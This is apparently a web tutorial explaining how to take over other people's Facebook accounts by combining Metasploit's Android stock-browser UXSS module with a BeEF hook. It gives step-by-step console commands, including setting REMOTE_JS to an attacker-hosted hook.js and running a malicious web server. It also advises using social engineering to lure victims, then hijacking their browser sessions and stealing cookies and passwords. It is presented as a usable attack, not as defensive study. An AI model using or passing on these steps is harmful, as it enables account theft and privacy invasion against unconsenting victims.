How to hack Facebook password with Metasploit and BeEF

How to hack Facebook password with Metasploit and BeEF

VPPOfficial by @TheDynamicNetwork

There are tons of articles out there for articles on how to hack  Facebook accounts and how to hack Facebook passwords. Many sites are even asking for money and surveys. Especially the Facebook online hacker tools that clam in to hack facebook just be using the victim’s username. These are fake.

Do not fall victims to these scams. There is no magic facebook hacking method. There are only some methods of exploiting vulnerabilities of Facebook, systems, and browsers and our dear old friend social engineering, which can be used to hack Facebook passwords.

Frameworks like Metasploit and BeEF can be used to hack a Facebook account via the browser. We will describe the method for the same in this article.

So with that out of the way, I will show you how you can hack Facebook with Metasploit and BeEF exploitation framework.

Following are some of the requirements you need to meet:

  • Install Kali Linux
  • Have a good Internet Connection
  • Have patience

Following are the steps to use to hack Facebook using Metasploit

Step 1: Start Kali Linux and open Metasploit

Let’s startup our Kali machine and then open Metasploit. By default its available on the left-hand sidebar. The one with a big “M” is Metasploit

You can also use the terminal to start Metasploit with the following command:

kali > msfconsole

Step 2: Find the right Exploit to use

Next, let’s find the perfect Exploit for this hack. In our case the exploit is the:

auxiliary/gather/android_stock_browser_uxss exploit

Let’s load that exploit by typing the following command:

msf5 > use auxiliary/gather/android_stock_browser_uxss

Step 3: Get the Exploit Info

Now that we have loaded the exploit module, let’s get some detailed information on this exploit. We can do this by using the following command:

msf5 > info

As you can see from this info page, this Exploit is targeted at kit kat android version 4.4 stock browser. You can read all the relevant information on Metasploit terminal, as shown below.

Step 4: Show and configure options

Next, let see the options we need to set for this Exploit to work.

We need to set the “REMOTE_JS” setting shown below to hook the victim with BeEF.

Step 5 Open BeEF framework

Now, open BeEF (Browser exploitation framework). By using this tool, we can easily hijack the victim’s browser and get all the passwords and cookies.

You can open BeEF, as shown below.

Once you open BeEF, it will ask you to enter a new password.

Once you have done that BeEf server will start and you will see the following page:

The default credentials are “beef” for username and the new password you just set.

Step 6 Setting JS to BeEF Hook

Back to Metasploit console now. To hack the victim’s Facebook account, we need to get access to the victim’s browser data. For this, we need to set the REMOTE_JS to the hook on BeEF.

For using this hack, make sure you use the correct IP:

syntax: set REMOTE_JS http://yourip:3000/hook.js

So in my case, this Metasploit command becomes

msf5> set REMOTE_JS

Now, we need to set the URIPATH to the root directory /.

So type:

msf5> set uripath /

Step 7: Running the Metasploit Web Server

Now we need to start the Metasploit web server which will host the BeEF hook so that when anyone visits our Website, their browser will be hooked to BeEF.

Start the server by using the Run command

msf > run

Step 8: Wait for the victim to visit the Website from an Android Browser

This step requires social engineering. Make sure you make the victim click the link by using attractive and catchy colours and stuff.

Step 9: Hooking the browser on BeEF via Metasploit

When the victim visits our malicious webserver at, the BeEF JavaScript will hook their android browser. It will appear under the “Hooked Browser” section in BeEF as shown below. You can now control their android browser and data.

Step 10: Now verify if the hooked Browser Is Authenticated with Facebook

Once the browser is connected to BeEF, you can see the browser as shown below. You should able to see multiple options to hack the victim and open their account. Or steal their cookies.

Check the detect social networks option. By using this option you see and hijack their facebook session.

Congratulations, you have successfully learned hacking facebook accounts with Metasploit and BeEF framework.

Join Our Group : TheDynamicSupport

To Get All Such Contents at first & To Learn Ethical Hacking Step By Step, Join Us Right Now:- Here

Report Page